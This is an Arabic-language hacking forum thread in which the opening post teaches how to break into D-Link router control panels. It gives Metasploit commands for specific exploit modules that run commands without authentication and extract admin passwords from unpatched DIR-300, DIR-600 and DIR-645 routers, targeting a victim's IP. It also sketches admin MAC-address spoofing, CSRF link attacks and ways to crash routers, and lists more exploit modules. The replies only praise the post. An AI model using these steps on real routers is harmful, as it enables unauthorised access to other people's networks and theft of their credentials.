1. أهلا وسهلاً بكم في :: IQ-TeaM FORUM :: .
    إذا كانت هذه الزيارة الأولى أو لديك الرغبة بالانضمام لأعضاء شبكة عراق تيم فيجب الاطلاع على خصوصية الشبكه فربما بقائك زائر افضل لك من الانضمام بحيث أن قوانين شبكة عراق تيم لا تتناسب مع اهتماماتك .
    • للأطلاع على الخصوصية وسياسة الاستخدام - التفاصيل
    • بعد الاطلاع على سياسة الموقع وقوانين شبكة عراق تيم يمكنك التسجيل معنا - تسجيل عضو جديد
    إستبعاد الملاحظة
الكاتب : ABOJANA IRAQY | المشاهدات : 520 | الردود : 4
  1. ABOJANA IRAQY

    ABOJANA IRAQY DeveloPer Plus

    الأنتساب:
    ‏10 مايو 2013
    المشاركات:
    126
    الإعجابات المتلقاة:
    66
    نقاط الجائزة:
    28
    [​IMG]
    بسَم آلله آلرَحمن آلرَحيم

    في هذا الموضوع الذي أتمنى أن تحبونه سأقدم لكم :

    أقوى الطرق المستعملة لاختراق راوترات D-Link

    عندما أتحدث عن راوترات D-Link فإننا نتحدث عن نسبة كبيرة من الشبكات

    و عندما أقصد إختراق فأعني بذلك الولــوج إلى واجــهـة التــحكـم

    جميع التطبيقات هي على : الـ M e t a s p l o i t

    عن الهدف : عنوان الإيبي فقط IP Adress

    الإختراق يكون عن طريق استغلال ثغرات في أجهزة D-Link


    [​IMG]

    D-link DIR 600 و D-Link DIR 300

    نوع الثغرة : Unauthenticated Remote Command Execution

    متطلبات الثغرة : راوتر من طراز DIR-300 أو DIR 600 غير محدث

    نتائج الثغرة : اليوزر و الباس لدخول واجهة التجكم

    auxiliary/admin/http/dlink_dir_300_600_exec_noauth

    [​IMG]

    نأتي للتطبيق :


    كود PHP:
    use auxiliary/admin/http/dlink_dir_300_600_exec_noauth
    set RHOST xxx
    .xxx.xxx.xxx
    exploit
    مع تبديل xxx.xxx.xxx.xxx بإيبي الهدف
    DIR-600
    [​IMG]
    DIR-300

    [​IMG]


    [​IMG]

    [FONT=Arial][COLOR=SandyBrown][COLOR=SlateGray]D-link DIR 645

    نوع الثغرة : [COLOR=SandyBrown]Paswword Extract [/COLOR]
    [/COLOR][/COLOR][/FONT]
    [B][B][B][B][B][B][B][B][B][COLOR=Gray]
    متطلبات الثغرة : راوتر من طراز [COLOR=SandyBrown]DIR 645[/COLOR] غير محدث

    نتائج الثغرة : اليوزر و [COLOR=SandyBrown]الباس[/COLOR] لدخول واجهة [COLOR=SandyBrown]التجكم [/COLOR]

    auxiliary/admin/http/dlink_dir_645_password_extractor

    نأتي[COLOR=SandyBrown] للتطبيق[/COLOR] :

    [PHP]use auxiliary/admin/http/dlink_dir_645_password_extractor
    set RHOST xxx.xxx.xxx.xxx
    exploit[/PHP]

    [/COLOR][/B][/B][/B][/B][/B][/B][/B][/B][/B]
    [FONT=Times New Roman]مع تبديل [COLOR=SandyBrown]xxx.xxx.xxx.xxx[/COLOR] بإيبي الهدف

    [IMG]http://www.iq-team.org/up/uploads/1406483734166.gif[/IMG]

    ثم نذهب إلى الملف الذي يقدمه لك الـ m e t a sploit

    و نفتحه بالـ notepad ++

    [IMG]http://www.iq-team.org/up/uploads/1406483734187.gif[/IMG]

    [/FONT]
    [​IMG]

    الثغرتان السالفتا الذكر تتمان على مستوى واجهة تحكم الراوتر

    لكن هناك ثغرات تتم على مستوى نظام الراوتر ( لــينكس )

    هذه الأخيرة تعطي صلاحيات أوسع للتحكم بكل مكونات لراوتر لكنها معقدة نسبيا

    يجب التوفر على بورت مفتوح لعمل اتصال البايلواد إضافة إلى دراية كبيرة بأوامر اللينكس

    و المعقدة في هذا النوع من الأجهزة لأننا على لينكس معدل بحيث أصبح فيرمواير

    أما هذه الثغرات فهي تندرج ضمن ثغرات الـ Remote الـ No Auth

    يعني ثغرات عن بعد و من دون دخول فإذا كان هدفك معرفة اليوزر و الباس أو ببساطة التحكم في

    الراوتر فإن هذا النوع من الثغرات يلبي حاجتك

    لكم ماذا لو هدفك اخر ، تغيير شيئ في واجهة التحكم مثلا شعار الـ D-Link

    فإنك بحاجة إلى ثغرة Local و تكون File Upload أو OS injection

    أما إذا أردت إحداث كراش في الراوتر فكل من اللوكال و الريموت قد يكون صالحا

    نأتي إلأى نوع ثالث مثلا في راوتر D-Link

    توجد ثغرة Admin Mac Adress Spoofing

    متطلبات الثغرة : الإتصال بالشبكة + معرفة ماك أدريس الأدمين + أن يكون الأدمين متصلا

    فما عليك إلى عمل تغيير في عنوان الماك ادريس إلى ماك أدريس الأدمين و مبروك الدخول من

    دون يوزر ولا باس

    و هناك ثغرات CSRF في أغلب الراوترات لكن التطبيق معقد بعض الشيئ

    تقضي لثغرة في ارسال رابط إلى الهدف و عند فتحه تتغير كامل الإعدادات

    المشكلة أن الأدمين يجب أن يكون متصلا أو عمل Active Session

    لذلك فالتطبيق يبقا نادرا مع غياب امكانية الـ Active Session في الراوترات

    بعض الثغرات :

    كود PHP:
    DIR-600 DIR-300 Unauthenticated Remote Command Execution
    D
    -Link DIR 645 Password Extractor
    D
    -Link DSL 320B Password Extractor
    DLink User
    -Agent Backdoor Scanner
    D
    -Link Devices Unauthenticated Remote Command Execution
    D
    -Link DIR-645 DIR-815 diagnostic.php Command Execution
    UTC excellent D
    -Link Devices Unauthenticated Remote D-Link DIR615h OS Command Injection
    UPnP SOAP Command Execution
    [​IMG]

    تم بحمد الله
    [​IMG]
     
  2. الأمير العراقي

    الأمير العراقي Developer

    الأنتساب:
    ‏3 مايو 2012
    المشاركات:
    90
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    6
    الإقامة:
    أرض الوطن
    رد: أقوى الطرق المستعملة لاختراق راوترات D-Link

    عاشت آيــدك حبي شرح رائع :ُeُel:​
     
  3. تــــركــــي

    تــــركــــي DeveloPer Plus

    الأنتساب:
    ‏25 ابريل 2012
    المشاركات:
    180
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    16
    رد: أقوى الطرق المستعملة لاختراق راوترات D-Link

    بارك الله فيك اخي

    شرح جميل ومنسق
     
  4. ارهابي انا

    ارهابي انا Developer

    الأنتساب:
    ‏25 مارس 2012
    المشاركات:
    26
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    1
    الإقامة:
    أمام الجهاز 24 ساعة
    رد: أقوى الطرق المستعملة لاختراق راوترات D-Link

    ابداع ما فوقه ابداع
    واصل يا بطل
     
  5. ƁƛƬ MƛƝ

    ƁƛƬ MƛƝ V • I • P

    الأنتساب:
    ‏16 يوليو 2014
    المشاركات:
    376
    الإعجابات المتلقاة:
    13
    نقاط الجائزة:
    18
    الوظيفة:
    web development
    اللغة البرمجية:
    C#
    Facebook:
    رد: أقوى الطرق المستعملة لاختراق راوترات D-Link

    شرح جميل

    مبدع واصل بدون فواصل
     

مشاركة هذه الصفحة